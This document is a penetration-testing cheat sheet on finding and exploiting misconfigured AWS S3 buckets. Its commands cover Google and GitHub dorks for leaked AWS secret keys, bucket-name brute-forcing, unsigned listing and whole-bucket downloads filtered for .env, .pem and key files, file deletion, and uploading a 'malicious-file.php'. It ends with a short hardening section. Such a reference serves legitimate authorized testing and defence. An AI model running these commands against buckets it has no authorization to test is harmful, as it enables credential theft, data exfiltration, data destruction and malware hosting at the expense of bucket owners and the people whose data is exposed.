AWS S3 Buckets
AWS S3 bucket reconnaissance, enumeration, and misconfiguration testing techniques.
16 categories · 40+ commands
Phase 1
Understanding AWS S3 Buckets
1. What is S3 bucket reconnaissance?
   Identifying publicly accessible or misconfigured AWS S3 buckets.
2. Purpose of S3 reconnaissance
   Helps organizations secure their cloud storage by finding exposed data.
3. Test access to a bucket with the AWS CLI:
   aws s3 ls (requires configured credentials)
4. Check if a bucket exists and is accessible (HTTP headers):
   curl -I https://target.s3.amazonaws.com
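The curl check above can be scripted so the status code is interpreted automatically. A minimal sketch, assuming the common S3 responses (200 = listable, 403 = bucket exists but access is denied, 404 = NoSuchBucket); the function names are invented here:

```shell
# Map an HTTP status code from a virtual-hosted S3 URL to its usual meaning.
# (Assumption: 200/403/404 semantics as described above.)
classify_status() {
  case "$1" in
    200) echo "public - listing enabled" ;;
    403) echo "exists - access denied" ;;
    404) echo "does not exist" ;;
    *)   echo "unexpected status: $1" ;;
  esac
}

# Probe one bucket name (network required).
check_bucket() {
  code=$(curl -s -o /dev/null -w '%{http_code}' "https://$1.s3.amazonaws.com")
  echo "$1: $(classify_status "$code")"
}

# Usage: check_bucket target
```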

Phase 2
Manual Methods for Identifying S3 Buckets
1. Test in the browser URL bar - basic bucket URL format:
   https://target.s3.amazonaws.com
2. Alternative bucket URL format (older path style):
   https://s3.amazonaws.com/target
3. S3 external endpoint format:
   https://target.s3-external-1.amazonaws.com
4. Dual-stack endpoint (IPv4 + IPv6):
   https://target.s3.dualstack.us-east-1.amazonaws.com
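The endpoint variants above can be generated in one place and piped into curl or httpx. A sketch; the hardcoded us-east-1 region and the function name are assumptions:

```shell
# Print the common endpoint variants for a single bucket name.
bucket_urls() {
  b="$1"
  echo "https://$b.s3.amazonaws.com"
  echo "https://s3.amazonaws.com/$b"
  echo "https://$b.s3-external-1.amazonaws.com"
  echo "https://$b.s3.dualstack.us-east-1.amazonaws.com"  # region is an assumption
}

# Example: bucket_urls target | while read -r u; do curl -s -o /dev/null -w "%{http_code} $u\n" "$u"; done
```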

Phase 3
Google Dorking for AWS S3 Buckets
1. Find S3 buckets related to the target domain:
   site:s3.amazonaws.com "target.com"
2. Wildcard search for all subdomain buckets:
   site:*.s3.amazonaws.com "target.com"
3. Search external S3 endpoints:
   site:s3-external-1.amazonaws.com "target.com"
4. Find buckets with directory listing enabled:
   site:s3.amazonaws.com intitle:"index of"
5. Search for buckets containing sensitive keywords:
   site:s3.amazonaws.com "target.com" "bucket" OR "aws_access_key" OR "secret"
6. Broad search across all Amazon AWS domains:
   site:amazonaws.com inurl:s3.amazonaws.com

Phase 4
Automating Google Dorking with DorkEye
1. DorkEye automates Google dorking for faster recon:
   https://github.com/BullsEye0/dorks-eye
2. Run DorkEye with a target domain and output file:
   python3 dorkeye.py -d target.com -o s3-results.txt
3. Filter results for S3 bucket URLs:
   cat s3-results.txt | grep -i 's3.amazonaws.com'

Phase 5
Using S3Misconfig for Fast Bucket Enumeration
1. S3Misconfig scans for buckets with listing enabled:
   https://github.com/Atharv834/S3BucketMisconf
2. Scan a list of bucket URLs and generate an HTML report:
   python3 s3misconfig.py -l bucket-list.txt -o results.html
3. Extract open buckets from the HTML report (-E is needed for the | alternation):
   cat results.html | grep -iE 'open bucket|listing enabled'

Phase 6
Finding S3 Buckets with HTTPX and Nuclei
1. Use Subfinder + HTTPX to find S3 in page titles (-E is needed for the | alternation):
   subfinder -d target.com -all -silent | httpx-toolkit -sc -title | grep -iE 'amazon s3|s3.amazonaws'
2. Scan subdomains with the Nuclei S3 detection template:
   subfinder -d target.com -all -silent | nuclei -t s3-detect.yaml -o s3-nuclei.txt
3. Filter Nuclei results for S3 findings:
   cat s3-nuclei.txt | grep -iE 's3|bucket'

Phase 7
Extracting S3 URLs from JavaScript Files with java2s3
1. Katana: tool to crawl a site and extract URLs, including JS files:
   https://github.com/projectdiscovery/katana
2. Crawl the target and collect JS file URLs:
   katana -u https://target.com/ -d 5 -jc | grep '\.js$' | tee alljs.txt
3. Extract S3 URLs from all JS files:
   cat alljs.txt | xargs -I {} curl -s {} | grep -oE 'https?://[^"]*\.s3\.amazonaws\.com[^"]*' | sort -u
4. java2s3: alternative tool for extracting S3 URLs from JS:
   https://github.com/mexploit30/java2s3
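The grep pipeline in step 3 can be wrapped as a reusable filter that pulls S3 URLs out of any text on stdin. A sketch; the function name and the slightly broadened regex (which also matches dual-stack and regional hostnames) are assumptions:

```shell
# Read arbitrary text (JS, HTML, config) on stdin, print unique S3 URLs.
extract_s3_urls() {
  grep -oE "https?://[a-zA-Z0-9.-]+\.s3[a-z0-9.-]*\.amazonaws\.com[^\"' ]*" | sort -u
}

# Example: cat alljs.txt | xargs -I {} curl -s {} | extract_s3_urls
```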

Phase 8
Brute-Forcing S3 Bucket Names with LazyS3
1. LazyS3: brute-force tool for AWS S3 bucket names:
   https://github.com/nahamsec/lazys3
2. Basic LazyS3 run with a target domain:
   ruby lazys3.rb target.com
3. Use a custom wordlist with LazyS3:
   ruby lazys3.rb target.com -w custom-wordlist.txt
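LazyS3 works by trying permutations of the target name against common environment words. The idea can be sketched in a few lines of shell; the affix list here is an illustrative assumption, not LazyS3's actual wordlist:

```shell
# Emit candidate bucket names built from a base name and common affixes.
permute_names() {
  base="$1"
  for w in dev staging prod test backup assets uploads logs; do
    echo "$base-$w"
    echo "$w-$base"
    echo "$base$w"
  done
}

# Example: permute_names target | sort -u > candidates.txt
```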

Phase 9
Using CeWL + S3Scanner to Find Open Buckets
1. Generate a custom wordlist from the target website:
   cewl https://target.com/ -d 3 -m 5 -w cewl-words.txt
2. Combine the CeWL output with a generic wordlist:
   cat cewl-words.txt rockyou.txt > final-wordlist.txt
3. S3Scanner: identify valid S3 buckets and check their permissions:
   https://github.com/sa7mon/S3Scanner
4. Scan the wordlist and enumerate bucket permissions:
   s3scanner -bucket-file final-wordlist.txt -enumerate -threads 10
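Before feeding final-wordlist.txt to S3Scanner, it helps to lowercase, deduplicate, and drop entries that can never be valid bucket names (3-63 characters; lowercase letters, digits, dots, hyphens; starting and ending with a letter or digit). A sketch; `clean_wordlist` is a name invented here:

```shell
# Filter stdin down to syntactically valid, unique S3 bucket names.
clean_wordlist() {
  tr 'A-Z' 'a-z' | grep -E '^[a-z0-9][a-z0-9.-]{1,61}[a-z0-9]$' | sort -u
}

# Example: cat cewl-words.txt rockyou.txt | clean_wordlist > final-wordlist.txt
```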

Phase 10
Extracting S3 Buckets from GitHub Repositories
1. Search GitHub repos for amazonaws references:
   org:target "amazonaws"
2. Find exposed AWS access keys in repos:
   org:target "aws_access_key"
3. Search for various AWS secret key formats:
   org:target "aws_secret_key" OR "aws_secret" OR "aws_key"
4. Find S3 bucket references in code:
   org:target "S3_BUCKET"

Phase 11
Websites for Public S3 Bucket Discovery
1. GrayHatWarfare: search public S3 buckets by keyword:
   https://buckets.grayhatwarfare.com/
2. OSINT.sh: another public S3 bucket search engine:
   https://osint.sh/buckets/
3. Nuclei template for S3 detection (reference):
   https://github.com/coffinxp/nuclei-templates/blob/main/http/technologies/s3-detect.yaml

Phase 13
AWS S3 Bucket Listing & File Management
1. List files in a bucket (no credentials needed if public):
   aws s3 ls s3://bucket-name --no-sign-request
2. Recursively list all files in human-readable format:
   aws s3 ls s3://bucket-name --recursive --human-readable --no-sign-request
3. Filter for potentially sensitive files:
   aws s3 ls s3://bucket-name --no-sign-request | grep -E '\.(env|pem|key|json|yml|yaml|config|php|ini|sql|db|log|backup|bak|zip|rar|7z|tar|gz)$'
4. Download a specific file from the bucket:
   aws s3 cp s3://bucket-name/file.txt ./ --no-sign-request
5. Download the entire bucket recursively:
   aws s3 cp s3://bucket-name/ ./ --recursive --no-sign-request
6. Delete a file (only if WRITE permission exists - authorized testing only!):
   aws s3 rm s3://bucket-name/file.txt --no-sign-request
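Commands 1-2 can be looped over a candidate list to triage which buckets allow anonymous listing. A sketch assuming the AWS CLI is installed; `bucket-list.txt` and the function names are placeholders invented here:

```shell
# Format one result line given a bucket name and the aws CLI exit status.
report() {
  if [ "$2" -eq 0 ]; then
    echo "$1: anonymous READ allowed"
  else
    echo "$1: listing denied or bucket not found"
  fi
}

# Try an unsigned listing against one bucket (network required).
check_read() {
  aws s3 ls "s3://$1" --no-sign-request >/dev/null 2>&1
  report "$1" $?
}

# Usage: while read -r b; do check_read "$b"; done < bucket-list.txt
```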

Phase 14
Exploiting Misconfigured Buckets
1. Public READ = anyone can list and download files.
   Risk: data exfiltration, sensitive information disclosure.
2. Public WRITE = anyone can upload files to the bucket.
   Risk: malware hosting, defacement, data poisoning.
3. Public FULL_CONTROL = read + write + delete permissions.
   Risk: complete bucket takeover, possible data destruction.
4. Example - upload a file if WRITE permission exists (authorized testing only!):
   aws s3 cp malicious-file.php s3://bucket-name/ --no-sign-request
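For authorized tests, the upload in step 4 is safer with a harmless, uniquely named marker file instead of anything executable. A sketch; the `poc-write-test-` naming convention is an arbitrary choice of this example:

```shell
# Build a unique, harmless marker filename for a write test.
marker_name() {
  echo "poc-write-test-$(date +%s).txt"
}

# Attempt an unsigned upload, then report (authorized testing only; network required).
test_write() {
  m=$(marker_name)
  echo "harmless write test" > "/tmp/$m"
  if aws s3 cp "/tmp/$m" "s3://$1/$m" --no-sign-request >/dev/null 2>&1; then
    echo "$1: anonymous WRITE allowed (uploaded $m - remember to remove it)"
  else
    echo "$1: write denied"
  fi
  rm -f "/tmp/$m"
}
```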

Phase 15
Securing S3 Buckets
1. Use IAM policies to strictly control who can access the bucket.
   Enable bucket policies and restrict access.
2. Avoid the public-read and public-read-write ACLs.
   Disable public ACLs unless strictly necessary.
3. Enable logging to detect unauthorized access attempts.
   Monitor logs using AWS CloudTrail.
4. Use S3 server-side encryption or client-side encryption.
   Implement encryption for sensitive data.
5. Enable S3 Block Public Access to prevent accidental exposure.
   Apply S3 Block Public Access at the account level.
Tools & Resources
S3Misconfig Tool
Scans for S3 buckets with listing enabled
DorkEye - Google Dorking
Automates Google dorking for S3 discovery
LazyS3 - Brute Forcer
Brute force S3 bucket names with permutations
java2s3 - JS Extractor
Extract S3 URLs from JavaScript files
S3Scanner
Find open buckets and check permissions
Katana - Crawler
Crawl and extract URLs from JS files
GrayHatWarfare
Public S3 bucket search engine
Nuclei S3 Detect Template
Nuclei template for S3 bucket detection
AWS CLI Documentation
Official AWS CLI S3 command reference